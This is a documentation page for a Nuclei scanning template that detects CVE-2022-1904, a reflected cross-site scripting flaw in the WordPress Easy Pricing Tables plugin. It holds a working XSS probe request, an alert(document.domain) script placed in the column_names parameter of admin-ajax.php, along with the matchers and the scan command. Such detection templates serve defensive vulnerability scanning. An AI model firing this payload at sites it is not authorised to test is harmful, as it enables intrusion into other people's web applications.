WordPress Easy Pricing Tables <3.2.1 - Cross-Site Scripting
ID: CVE-2022-1904
Severity: medium
Author: Akincibor
Tags: cve,cve2022,wp,wordpress,wpscan,wp-plugin,xss,fatcatapps
Description
Section titled “Description”WordPress Easy Pricing Tables plugin before 3.2.1 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape a parameter before reflecting it back in a page available to any user both authenticated and unauthenticated when a specific setting is enabled.
YAML Source
Section titled “YAML Source”id: CVE-2022-1904
info: name: WordPress Easy Pricing Tables <3.2.1 - Cross-Site Scripting author: Akincibor severity: medium description: | WordPress Easy Pricing Tables plugin before 3.2.1 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape a parameter before reflecting it back in a page available to any user both authenticated and unauthenticated when a specific setting is enabled. impact: | Successful exploitation of this vulnerability could lead to cross-site scripting (XSS) attacks, allowing an attacker to execute malicious scripts on the victim's browser. remediation: | Update to the latest version of WordPress Easy Pricing Tables plugin (3.2.1) to mitigate the vulnerability. reference: - https://wpscan.com/vulnerability/92215d07-d129-49b4-a838-0de1a944c06b - https://nvd.nist.gov/vuln/detail/CVE-2022-1904 - https://github.com/ARPSyndicate/cvemon - https://github.com/ARPSyndicate/kenzer-templates - https://github.com/cyllective/CVEs classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-1904 cwe-id: CWE-79 epss-score: 0.00086 epss-percentile: 0.35299 cpe: cpe:2.3:a:fatcatapps:easy_pricing_tables:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 1 vendor: fatcatapps product: easy_pricing_tables framework: wordpress tags: cve,cve2022,wp,wordpress,wpscan,wp-plugin,xss,fatcatapps
http: - method: GET path: - '{{BaseURL}}/wp-admin/admin-ajax.php?action=ptp_design4_color_columns&post_id=1&column_names=<script>alert(document.domain)</script>'
matchers-condition: and matchers: - type: word part: body words: - '<script>alert(document.domain)</script> - Color'
- type: word part: header words: - text/html
- type: status status: - 200# digest: 4a0a00473045022100bb654fdfd6c28abbfb4b8b213aee8ba4ebdb3c3706527902d6f20ce4ecab93ef022012014602bc82aa931c229bdd9740532bf5c56e90f7a8d40940d58c09560a810d:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-1904.yaml"